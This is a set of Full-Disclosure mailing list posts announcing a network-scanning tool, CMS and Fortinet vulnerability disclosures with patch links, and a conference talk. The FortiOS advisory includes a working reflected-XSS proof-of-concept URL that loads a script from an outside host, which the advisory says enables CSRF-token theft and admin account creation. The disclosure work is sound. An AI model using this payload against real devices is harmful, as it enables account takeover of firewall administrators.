[Full-disclosure] pMap v1.10
Hey folks, We just released a new version of pMap, our tool for passively discovering, scanning, and fingerprinting hosts on the local network. Description: Discovery, Scanning, and Fingerprinting via Broadcast and Multicast Traffic Platform(s): Windows (Includes a Metasploit script for remote deployment) Version:1.10 Date:10/09/2013 New Features -- Additional Multicast DNS and SSDP fingerprints Excludes connected printers from fingerprinting process Displays any available service configuration Download page: http://www.hellfiresecurity.com/tools.htm Homepage(s) - http://www.hellfiresecurity.com - http://www.networkattackinfo.com/ Blog- http://www.networkattackinfo.com/dokuwiki/doku.php?id=blog Author - Gregory Pickett License- GNU General Public License version 3.0 (GPLv3) Comments, bug reports, and/or feature requests should be sent to mailto:fg...@si6networks.com i...@hellfiresecurity.com. And if you are interested in contributing Multicast DNS or SSDP fingerprints, let us know. Enjoy, Greg -- Gregory Pickett, CISSP, GCIA, GPEN www.hellfiresecurity.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Ektron CMS TakeOver Part (2) - PaylPal-Forward.com demonstration
As previously stated, I would post an update for Ektron CMS bypassing the security fix. A full step by step with the usual screen shots can be found at - http://www.securatary.com/vulnerabilities In this example, we use www.paypal-forward.com as a demonstration site. I would like to say that PayPal fixed this issue with their own workaround extremely quickly. Excellent work by their security / dev team. All the best Mark Litchfield www.securatary.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [CVE-2014-1860] PHP object insertion / possible RCE in Contao CMS = 3.2.4
Hi, I have discovered a vulnerability that might lead to code execution in Contao CMS = 3.2.4 Contao CMS = 3.2.4 does not properly validate user input in several locations which is then passed directly into PHP's unserialize. This has been fixed in Contao 3.2.5 as per commit: https://github.com/contao/core/commit/8c9cb044bdc887a8202bb65a64545c025664f957 and https://github.com/contao/core/commit/1717336598fdcf1ed3f4ad488e140147cb31516d Announcements can be found at https://contao.org/en/news/contao-3_2_5.html https://contao.org/en/news/contao-2_11_14.html Thanks to the Contao developers for being so responsive. The full report can be found at my repo in https://github.com/pedrib/PoC/blob/master/contao-3.2.4.txt Regards, Pedro Ribeiro Agile Information Security ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [CVE-2014-1836] Arbitrary file deletion in ImpressCMS 1.3.6 and two XSS issues
Hi, I have discovered two vulnerabilities in ImpressCMS. These have been fixed in the new 1.3.6 version, which you can get at https://sourceforge.net/projects/impresscms/files/ImpressCMS%20Official%20Releases/ImpressCMS%201.3%20Branch/ImpressCMS%201.3.6/. One is an arbitrary file deletion and the other is two cross site scripting issues. Note that I was unable to exploit the XSS issues due to the inbuilt protection module, but someone smarter / with more time might be able to do it. The tickets containing the information are available here https://www.assembla.com/spaces/dW4voyNP0r4ldbeJe5cbLr/tickets?report%5Bestimate_show%5D=truereport%5Bid%5D=0report%5Bmilestone_id_cond%5D=1report%5Bmilestone_id_val%5D=4129593report%5Btitle%5D=All+Tickets+for+%27ImpressCMS+1.3.6%27report%5Btotal_estimate_show%5D=truereport%5Btotal_invested_hours_show%5D=truereport%5Bworking_hours_show%5D=true. The full report can be seen at my repo https://github.com/pedrib/PoC/blob/master/impresscms-1.3.5.txt Thanks in advance, and thanks to the ImpressCMS team for being so responsive. Regards, Pedro Ribeiro Agile Information Security ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] XSS Reflected vulnerabilities in OS of FortiWeb v 5.0.3 (CVE-2013-7181)
I. VULNERABILITY - XSS Reflected vulnerabilities in OS of FortiWeb v 5.0.3 CVE-2013-7181 http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-7181 II. BACKGROUND - Fortinet's industry-leading, Network Security Platforms deliver Next Generation Firewall (NGFW) security with exceptional throughput, ultra low latency, and multi-vector threat protection. III. DESCRIPTION - Has been detected a XSS Reflected vulnerability in Fortiweb in /user/ldap_user/add parameter filter 5.0.3 , that allows the execution of arbitrary HTML/script code to be executed in the context of the victim user's browser and/or Session Hijacking attack IV. PROOF OF CONCEPT - The application does not validate the parameter filter in /user/ldap_user/add. V. BUSINESS IMPACT - That allows the execution attackers to hijack the authentication of administrators. VI. REQUIREMENTS --- An Attacker needs to know the IP of the device. An Administrator needs an authenticated connection to the device. VII. SYSTEMS AFFECTED - Try FortiWEB VM or appliance v5.0.3 VIII. SOLUTION - Upgrade to FortiWeb 5.1.0 or higher. By William Costa ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Fortinet FortiOS 5.0.5 contains a reflected cross-site scripting (XSS) vulnerability ( CVE-2013-7182)
I. VULNERABILITY - Reflected XSS Attacks vulnerabilities in FortiOS 5.0.5 II. BACKGROUND - Fortinet's industry-leading, Network Security Platforms deliver Next Generation Firewall (NGFW) security with exceptional throughput, ultra low latency, and multi-vector threat protection. III. DESCRIPTION - Has been detected a Reflected XSS vulnerability in FortiOS in 5.0.5. The code injection is done through the parameter mkey in the page /firewall/schedule/recurrdlg IV. PROOF OF CONCEPT - The application does not validate the parameter mkey correctly. http://IP_FORTIGATE/firewall/schedule/recurrdlg?mkey=a;SCRIPT SRC=http://10.0.1.120/xss/good.js;/SCRIPT V. BUSINESS IMPACT - An attacker can execute arbitrary HTML or script code in a targeteduser's browser, , that allows the execution of arbitrary HTML/script code to be executed in the context of the victim user's browser allowing theft CSRF token, thus enabling the creation of a Administrator User in box for full access VI. SYSTEMS AFFECTED - Try FortiOS v5.0.5 VM and Applaince VII. SOLUTION Upgrade to FortiOS 5.0.6 or higher. References http://www.fortiguard.com/advisory/FG-IR-14-003/http://www.kb.cert.org/vuls/id/728638 By William Costa ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] H2HC 10 - FX Keynote Video is Up
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Hello List, I'm glad to announce that we finally published FX's Keynote Video at H2HC 10: http://youtu.be/FWTmfDsebNM We've received an impressive amount of great feedback in this talk. Soon we going to publish more talks, so follow us if you want to know more: @h2hconference Our website (with this year's call for papers and more info): https://www.h2hc.com.br Best Regards, Rodrigo (BSDaemon) https://twitter.com/bsdaemon -BEGIN PGP SIGNATURE- Version: GnuPG/MacGPG2 v2.0.17 (Darwin) Comment: GPGTools - http://gpgtools.org Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/ iEYEARECAAYFAlLxM0QACgkQRpuC3B/O3qGpBgCbBsGUKitX4DHGRVds3MVgZy/c tYMAn1gAU6D5GVUkJxGtx+kpoPCKYupq =vDDW -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/